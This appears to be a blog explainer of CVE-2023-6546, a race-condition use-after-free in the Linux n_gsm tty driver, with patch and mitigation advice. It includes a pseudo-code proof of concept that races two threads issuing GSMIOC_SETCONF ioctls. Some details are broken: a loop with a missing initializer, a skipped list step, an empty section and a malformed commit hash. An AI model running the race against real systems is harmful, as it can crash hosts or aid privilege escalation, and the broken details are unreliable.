CVE-2023-6546 - Race Condition in Linux GSM 071 tty Multiplexor Lets Attackers Get Root
CVE-2023-6546 is a newly discovered security issue in the Linux kernel affecting the GSM 071 tty multiplexor. This bug can let a regular (unprivileged) user on a Linux machine gain root access—or crash the system. Let’s break down how this bug works, see a code snippet, link to original sources, and explore how it can be exploited.
What Is the GSM 071 tty Multiplexor?
The *GSM 071 tty multiplexor* (n_gsm line discipline) is a kernel driver used for multiplexing several virtual serial ports over a single serial port, following the 3GPP TS 07.10 standard. You’d find it on embedded devices, things like modems, and sometimes Linux servers with special hardware attached.
The Problem: Race Condition and Use-After-Free
CVE-2023-6546 is a *race condition* in the handling of the GSMIOC_SETCONF ioctl call. If two processes/threads call GSMIOC_SETCONF at the same time on the same tty with the gsm mux mode turned on, it's possible for one thread to free a structure (struct gsm_dlci) while the other thread is still using it. That’s called “use-after-free”.
Here’s a simplified explanation
1. Thread A and Thread B both open the same tty file and set the GSM line discipline (N_GSM071).
Both simultaneously call the GSMIOC_SETCONF ioctl on the same tty.
3. The driver restarts the GSM mux (multiplexer) as part of this. Both try to reconfigure things in parallel.
4. During this, memory for a data structure (struct gsm_dlci) is freed by one thread but is still used by the other.
5. Classic use-after-free! If an attacker is clever, they can control what gets written after the free, and thus get code execution in kernel mode.
Code Snippet: Where It Goes Wrong
The core of the bug is in the gsmld_ioctl() function in the file drivers/tty/n_gsm.c. Here’s a snippet before the patch (simplified):
case GSMIOC_SETCONF:
// Reconfigure gsm mux
gsm_cleanup_mux(gsm); // Frees old channels (gsm_dlci)
ret = gsm_activate_mux(gsm, &gsm_config); // Allocates new
break;
If gsm_cleanup_mux() is called while another thread is still using the old gsm_dlci, you get a use-after-free!
Patch Fix: The kernel patch adds a mutex to serialize gsm mux reconfiguration.
Reference to the patch:
Linux kernel commit fixing CVE-2023-6546
An attacker needs
- Ability to access a serial port device node (like /dev/ttyGS)
- Ability to load the n_gsm line discipline (may need CAP_SYS_ADMIN, but some setups allow regular users)
PoC Sketch (pseudo-code)
int fd = open("/dev/ttyGS", O_RDWR);
int ldisc = N_GSM071;
ioctl(fd, TIOCSETD, &ldisc);
void *thread_func(void *arg) {
for (int i=; i<100000; i++) {
ioctl(fd, GSMIOC_SETCONF, &conf);
}
return NULL;
}
// Start two threads racing ioctl
pthread_t t1, t2;
pthread_create(&t1, NULL, thread_func, NULL);
pthread_create(&t2, NULL, thread_func, NULL);
pthread_join(t1, NULL);
pthread_join(t2, NULL);
Warning: Actually owning the race and exploiting use-after-free for code execution is non-trivial—you need deep kernel knowledge and typically heap spraying techniques.
Denial of Service: attacker can crash the machine
- Impact is local, but any process with serial/GSM access can try
Who’s affected?
How to Protect Your Linux System
- Upgrade: The vulnerability was fixed in Linux kernel commit c5ad531ae7daeca73a6aea92a114e1c3e3b7b6d (Jan 2024). Update to at least kernel 6.7.3, 6.6.15, 6.1.77, or corresponding update for your distro.
Restrict access: Lock down who can open GSM serial devices and load n_gsm line discipline.
- Monitor for kernel OOPS/panics involving n_gsm
References and Further Reading
- CVE-2023-6546 entry at NVD
- Linux kernel patch
- oss-security discussion list
- Red Hat CVE page
TL;DR
If your system doesn’t use n_gsm, you're likely safe. If you do, upgrade now! CVE-2023-6546 is a textbook example of how small race conditions in obscure kernel drivers can turn into major security problems—so patch early, patch often!
Timeline
Published on: 12/21/2023 20:15:08 UTC
Last modified on: 02/28/2024 15:15:07 UTC